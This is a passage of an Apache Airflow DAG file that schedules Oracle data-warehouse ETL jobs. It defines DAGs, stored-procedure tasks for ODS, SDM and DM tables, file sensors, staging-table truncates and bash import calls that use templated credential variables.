dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_ODS_PRD"
if job_flow_name == 'I_SDM_CMN':
data_stage = ['ODS']
else:
data_stage = re.findall(r"_(.*?)_","D_ODS_PRD")
D_ODS_PRD = airflow.DAG(
"D_ODS_PRD",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_ODS_QAM"
if job_flow_name == 'I_SDM_CMN':
data_stage = ['ODS']
else:
data_stage = re.findall(r"_(.*?)_","D_ODS_QAM")
D_ODS_QAM = airflow.DAG(
"D_ODS_QAM",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "D_ODS_SCM"
if job_flow_name == 'I_SDM_CMN':
data_stage = ['ODS']
else:
data_stage = re.findall(r"_(.*?)_","D_ODS_SCM")
D_ODS_SCM = airflow.DAG(
"D_ODS_SCM",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "W_ODS_QAM"
if job_flow_name == 'I_SDM_CMN':
data_stage = ['ODS']
else:
data_stage = re.findall(r"_(.*?)_","W_ODS_QAM")
W_ODS_QAM = airflow.DAG(
"W_ODS_QAM",
tags=["PRD", data_stage[0]],
schedule_interval="@weekly",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "M_ODS_CUS"
if job_flow_name == 'I_SDM_CMN':
data_stage = ['ODS']
else:
data_stage = re.findall(r"_(.*?)_","M_ODS_CUS")
M_ODS_CUS = airflow.DAG(
"M_ODS_CUS",
tags=["PRD", data_stage[0]],
schedule_interval="@monthly",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
job_flow_name = "Y_ODS_CUS"
if job_flow_name == 'I_SDM_CMN':
data_stage = ['ODS']
else:
data_stage = re.findall(r"_(.*?)_","Y_ODS_CUS")
Y_ODS_CUS = airflow.DAG(
"Y_ODS_CUS",
tags=["PRD", data_stage[0]],
schedule_interval="@daily",
dagrun_timeout=timedelta(minutes=60),
template_searchpath=tmpl_search_path,
default_args=args,
# start_date=airflow.utils.dates.days_ago(1),
max_active_runs=1,
catchup=False
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MTL_SYSTEM_ITEMS_B"
MTL_SYSTEM_ITEMS_B = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FND_COLUMNS"
FND_COLUMNS = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FND_LOOKUP_TYPES"
FND_LOOKUP_TYPES = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FND_LOOKUP_VALUES"
FND_LOOKUP_VALUES = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FND_TABLES"
FND_TABLES = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MTL_CATEGORIES_B"
MTL_CATEGORIES_B = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MTL_CATEGORY_SETS_B"
MTL_CATEGORY_SETS_B = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MTL_CUSTOMER_ITEMS"
MTL_CUSTOMER_ITEMS = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MTL_ITEM_CATALOG_GROUPS_B"
MTL_ITEM_CATALOG_GROUPS_B = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MTL_ITEM_CATEGORIES"
MTL_ITEM_CATEGORIES = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MTL_ITEM_STATUS_TL"
MTL_ITEM_STATUS_TL = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "PRJ_WORKTIMEDATA"
PRJ_WORKTIMEDATA = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "XXPLM_MODEL"
XXPLM_MODEL = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "XXPLM_PROJECT"
XXPLM_PROJECT = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "XXPLM_TFD"
XXPLM_TFD = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "Z_CDOCUMENT_CHECKING_RULE"
Z_CDOCUMENT_CHECKING_RULE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_XXPLM_MODEL_CHECKRULE_V"
MV_XXPLM_MODEL_CHECKRULE_V = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "XXPLM_EC_CHANGE_TYPE"
XXPLM_EC_CHANGE_TYPE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "NSP_REQ_HEADERS"
NSP_REQ_HEADERS = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "NSP_REQ_LINES"
NSP_REQ_LINES = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "EFLOW_PCS_HEADER_TW"
EFLOW_PCS_HEADER_TW = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "EFLOW_PCS_LINEEE_TW"
EFLOW_PCS_LINEEE_TW = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "EFLOW_PCS_LINEER_TW"
EFLOW_PCS_LINEER_TW = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "EFLOW_BTMS_EXPENSEPROJECT_TW"
EFLOW_BTMS_EXPENSEPROJECT_TW = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_PROJECT_ACTIVITY_V"
MV_PROJECT_ACTIVITY_V = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "MV_XXPLM_CFDMETADATA_V"
MV_XXPLM_CFDMETADATA_V = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD_SRC,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_PLM_CATEGORY"
SDM_PLM_CATEGORY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_ITEM"
SDM_ITEM = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_ECN_REASON"
SDM_ECN_REASON = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_XXPLM_EC"
SDM_XXPLM_EC = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_ECN_CASE_AFTER_MP"
SDM_ECN_CASE_AFTER_MP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_CDOC_COMPLETION_RATE"
SDM_CDOC_COMPLETION_RATE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_UPLOAD_CDOC_COUNT"
SDM_UPLOAD_CDOC_COUNT = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_TOTAL_CDOC_COUNT"
SDM_TOTAL_CDOC_COUNT = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_PROJECT_CODE"
SDM_PROJECT_CODE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_TOOLING_TOTAL_EXPENSE"
SDM_TOOLING_TOTAL_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_DMST_AND_INTL_TRAVEL_EXP"
SDM_DMST_AND_INTL_TRAVEL_EXP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_RD_LABOR_HOURS_EXPENSE"
SDM_RD_LABOR_HOURS_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_TESTING_EXPENSE"
SDM_TESTING_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_CTF_EXPENSE"
SDM_CTF_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_EQT_EXPENSE"
SDM_EQT_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_EPR_MFG_SAMPLE_BUILD_EXP"
SDM_EPR_MFG_SAMPLE_BUILD_EXP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_EPR_MFG_CONVERSION_COST"
SDM_EPR_MFG_CONVERSION_COST = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_CDOC_PLANNED_DEV_TIME"
SDM_CDOC_PLANNED_DEV_TIME = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_PROD_DEV_MLST_DELAY_RATE"
SDM_PROD_DEV_MLST_DELAY_RATE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_CDOC_DELAY_TIME"
SDM_CDOC_DELAY_TIME = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_PRODUCT_ACTUAL_EXPENSE"
SDM_PRODUCT_ACTUAL_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "SDM_PRODUCT_EXPENSE_BUDGET"
SDM_PRODUCT_EXPENSE_BUDGET = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_SDM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_PROD_DEV_MLST_DELAY_RATE"
FCT_PROD_DEV_MLST_DELAY_RATE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_ECN_CASE_AFTER_MP"
FCT_ECN_CASE_AFTER_MP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_EPR_MFG_CONVERSION_COST"
FCT_EPR_MFG_CONVERSION_COST = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_TOOLING_TOTAL_EXPENSE"
FCT_TOOLING_TOTAL_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_DMST_AND_INTL_TRAVEL_EXP"
FCT_DMST_AND_INTL_TRAVEL_EXP = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_RD_LABOR_HOURS_EXPENSE"
FCT_RD_LABOR_HOURS_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "FCT_TESTING_EXPENSE"
FCT_TESTING_EXPENSE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DIM_ITEM"
DIM_ITEM = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DIM_PLM_CATEGORY"
DIM_PLM_CATEGORY = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DIM_ECN_REASON"
DIM_ECN_REASON = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=ODS-MAIN
my_taskid = "DIM_PROJECT_CODE"
DIM_PROJECT_CODE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_DM_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Tier1_OEM_Mapping_Table_WH"
ODS_UC_Tier1_OEM_Mapping_Table_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Tier1_OEM_Mapping_Table_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Tier1_OEM_Mapping_Table_STG"
UC_Tier1_OEM_Mapping_Table_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Tier1_OEM_Mapping_Table"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Tier1_OEM_Mapping_Table_LD"
ODS_UC_Tier1_OEM_Mapping_Table_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Tier1_OEM_Mapping_Table"
)
# JOB_TYPE=SQL
my_taskid = "UC_Tier1_OEM_Mapping_Table"
UC_Tier1_OEM_Mapping_Table = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Customer_Model_Name_WH"
ODS_UC_Customer_Model_Name_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Customer_Model_Name_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Customer_Model_Name_STG"
UC_Customer_Model_Name_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Customer_Model_Name"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Customer_Model_Name_LD"
ODS_UC_Customer_Model_Name_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Customer_Model_Name"
)
# JOB_TYPE=SQL
my_taskid = "UC_Customer_Model_Name"
UC_Customer_Model_Name = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Pre_Project_information_WH"
ODS_UC_Pre_Project_information_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Pre_Project_information_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Pre_Project_information_STG"
UC_Pre_Project_information_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Pre_Project_information"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Pre_Project_information_LD"
ODS_UC_Pre_Project_information_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Pre_Project_information"
)
# JOB_TYPE=SQL
my_taskid = "UC_Pre_Project_information"
UC_Pre_Project_information = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Premium_Freight_WH"
ODS_UC_Premium_Freight_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Premium_Freight_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Premium_Freight_STG"
UC_Premium_Freight_STG = OracleOperatorWithTemplatedParams(
